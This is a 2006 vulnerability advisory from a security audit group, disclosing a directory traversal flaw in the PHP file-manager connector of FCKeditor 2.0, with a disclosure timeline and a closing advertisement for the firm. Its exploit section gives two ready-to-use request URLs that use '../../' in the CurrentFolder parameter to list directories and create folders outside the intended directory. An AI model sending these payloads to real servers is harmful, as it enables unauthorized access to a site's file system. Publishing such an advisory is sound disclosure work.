Advisory: NSAG-№195-23.02.2006 Research: NSA Group [Russian company on Audit of safety & Network security] Site of Research: http://www.nsag.ru or http://www.nsag.org Product: FCKeditor 2.0 FC Site of manufacturer: http://www.fckeditor.net The status: 19/11/2005 - Publication is postponed. 19/11/2005 - Manufacturer is notified. 21/02/2006 - Answer of the manufacturer is absent. 21/02/2006 - Publication of vulnerability. Original Advisory: http://www.nsag.ru/vuln/952.html Risk: Hide Description: The output for limits of a virtual directory is possible. Influence: Listing of directories, creation of folders outside a virtual directory. Exploit: http://SERVER/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=File&CurrentFolder=../../ http://SERVER/filemanager/browser/default/connectors/php/connector.php?Command=CreateFolder&Type=File&CurrentFolder=../../&NewFolderName=TESTNAME Decision: To address on a site of the manufacturer http://www.fckeditor.net Or contact us and receive consultations. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Our company is the independent auditor of the software in market IT. At present independent audit of the software becomes the standard practice and we suggest to make a let out product as much as possible protected from a various sort of attacks of malefactors! www.nsag.ru «Nemesis» © 2006 ------------------------------------ Nemesis Security Audit Group © 2006.
